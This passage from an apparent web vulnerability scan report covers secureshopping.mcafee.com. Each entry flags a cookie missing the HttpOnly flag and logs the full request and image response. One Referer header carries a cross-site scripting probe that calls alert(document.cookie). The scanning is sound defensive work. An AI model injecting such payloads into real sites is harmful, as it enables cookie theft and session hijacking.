Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:26 GMT
ETag: "5D7pOrfoVF3"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:26 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:26 GMT
Content-Length: 2416

GIF89a,.<.....H[.8T.....)............#C...r|.......|.#..................................j...............6.............z......3..7....\t........1..........ax.u.............}.._iq.Mgjsz..........%9....
...[SNIP]...

4.196. http://secureshopping.mcafee.com/images/nav-menu-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:30 GMT
ETag: "5D7pOrfoUhq"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:30 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:30 GMT
Content-Length: 99

GIF89a...........#&.#&.$%.$&.$&.#&.#&.$&....$&...............!.......,...........0I..E6#D.9B1.F...;

4.197. http://secureshopping.mcafee.com/images/nav-menu-left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-left.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:27 GMT
ETag: "5D7pOrfoUmh"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:27 GMT
Content-Length: 410

GIF89a........#&.#&.#&....$&.$&.$%.............$%....#%....#%....&*..........$%.......~...........$&.#%..........#&.#&.$&.$&.#&.$&....$&................................................................
...[SNIP]...

4.198. http://secureshopping.mcafee.com/images/nav-menu-right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-right.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:27 GMT
ETag: "5D7pOrfoUmm"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:27 GMT
Content-Length: 415

GIF89a........#&.#&.#&....$&.$&.$%.............$%....#%....#%....&*..........$%.......~...........$&.#%..........#&.#&.$&.$&.#&.$&....$&................................................................
...[SNIP]...

4.199. http://secureshopping.mcafee.com/images/nav-menu-split.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-split.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-split.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:28 GMT
ETag: "5D7pOrfoUg0"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:28 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:28 GMT
Content-Length: 45

GIF89a.............!.......,...........D..X.;

4.200. http://secureshopping.mcafee.com/images/nav-menu-tab-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-tab-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-tab-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:31 GMT
ETag: "5D7pOrfoUiy"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:31 GMT
Content-Length: 171

GIF89a.......................................................................................................!.......,..........(.eUdYQ(UM.D(..<..... Ep..F".p. H.2.......;

4.201. http://secureshopping.mcafee.com/images/nav-menu-tab-left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-tab-left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-tab-left.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:28 GMT
ETag: "5D7pOrfoUjM"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:28 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:28 GMT
Content-Length: 197

GIF89a.......................................................................................................!.......,..........B EUcTE.$..TI.<5n.T.R.F....a.xL....PQ(*.D%..8......L..DbB..+h..RH...;

4.202. http://secureshopping.mcafee.com/images/nav-menu-tab-right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-menu-tab-right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-menu-tab-right.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:28 GMT
ETag: "5D7pOrfoUjM"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:28 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:28 GMT
Content-Length: 197

GIF89a.......................................................................................................!.......,..........B v].XU..M..Nh.`.ESV.a..5. .y<0..... ....".`.
...Y,,..fL..-...c....;

4.203. http://secureshopping.mcafee.com/images/nav-search-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/nav-search-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/nav-search-bg.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:31 GMT
ETag: "5D7pOrfoUix"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:31 GMT
Content-Length: 170

GIF89a..A....................................................................................................!.......,......A...' .1....EYV3E.#T.Sl..I..d. .C,..H..3Hd.!.;

4.204. http://secureshopping.mcafee.com/images/rss.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/rss.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/rss.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:31 GMT
ETag: "5D7pOrfoUnP"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:31 GMT
Content-Length: 456

GIF89a$....4..]..p...w.\..e.....W..S..c........g$.Z..\............f.T......D.V.....u5........g.z"........g....z".....V..........Y......g........f._..b...g.P...Wfff....f................................
...[SNIP]...

4.205. http://secureshopping.mcafee.com/images/star_half.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/star_half.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 11:55:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/star_half.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/babyb75be%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c34af5df36/toys/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; 